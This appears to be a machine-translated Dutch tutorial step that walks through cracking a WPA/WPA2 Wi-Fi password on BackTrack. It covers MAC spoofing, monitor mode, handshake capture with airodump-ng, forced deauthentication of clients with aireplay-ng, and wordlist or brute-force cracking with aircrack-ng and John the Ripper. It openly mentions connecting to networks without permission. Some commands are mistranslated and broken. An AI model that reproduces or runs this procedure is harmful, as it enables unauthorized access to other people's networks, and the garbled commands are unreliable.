Stap 3: Hack WPA/WPA2
-Opstarten in BackTrack
-Openstellen Konsole die een command line utility BackTrack ingebouwd is. Het is de zwarte doos in de Hand linkerbenedenhoek (zie afbeelding).
Wij zullen nu het invoeren van de volgende opdrachten in de opdrachtregel opgemerkt door zowel vet als uitleg over wat ze doen:
-De volgende opdrachten stoppen de draadloze interface zodat kunt u uw mac-adres, dit is belangrijk omdat uw mac-adres een unieke id is zodat faken een een goed idee is als u verbinding maakt met een netwerk dat u hebt geen toestemming om. (die overigens ik geheel veroordelen)
1:
airmon-ng stop wlan0
ifconfig wlan0 omlaag
macchanger--mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
2:
-Nu zullen we het hulpprogramma airodump-ng in monitor modus, dit zal ons in staat stellen te zien van alle draadloze netwerken rond ons (Zie de eerste afbeelding).
airodump-ng mon0
Nu Kies het netwerk dat u wilt kappen en Let op de BSSID, en het kanaal is een evenals de ESSID. De PWR moet worden vrij hoog te kunnen om het te kappen, dit wordt bepaald door hoe dicht je bent op het wireless router. Hoe dichter u bent, hoe beter.
Zodra u hebt Voer gekozen het draadloze netwerk het volgende in de terminal:
Dit zal vastleggen pakketten schrijven en zet ze in het bestand "bestandsnaam", we proberen te veroveren de handdruk tussen de router en de draadloze verbinding die zal ons de sleutel die wij moeten kraken.
3:
airodump-ng mon0--kanaal *--bssid **: **: **: **: **: ** -w bestandsnaam
De volgende stap is optioneel, maar wordt ten zeerste aanbevolen aangezien het het proces veel versnellen zal.
Eenmaal "WPA handdruk: **: **: **: **: **: **" verschijnt in de rechter bovenhoek, we kunnen gaan. Als u problemen bij het verkrijgen van de WPA handdruk ondervindt optreden dan stap 4.
4:
aireplay-ng-0 1 - een **: **: **: **: **: ** - c **: **: **: **: **: ** mon0
Wat deze stap (4) doet, is dat het deauthorizes een draadloze verbinding en trie te herstellen zodat zal het genereren van een nieuwe handdruk te vangen. Deze stap wordt beëindigd zodra u de handdruk hebben gevangen.
5:
aircrack-ng – w wordlist.lst -b **: **: **: **: **: ** filename.cap
Stap 5 is nu proberen te kraken van het wachtwoord in "filename.cap" met behulp van een lijst van woorden, hier genaamd "wordlist.lst" kunt u een goed woordenboek van 200 miljoen woord downloaden hier (128 MB maar uitgepakt is 800 MB).
Uw computer heeft voor het berekenen van de hash-waarde van elk wachtwoord in die lijst maar een computer kan gaan door deze 200 miljoen wachtwoorden in 6-12 uur.
6.
Als u het wachtwoord niet wordt gevonden in het woordenboek kunt proberen en grof geweld het wachtwoord met dit commando: (Let op dit kan erg lang duren afhankelijk van de Wachtwoordsterkte van hun).
/pentest/password/jtr/john--stdout--incrementele: alle | aircrack-ng - b **: **: **: **: **: ** -w - filename.cap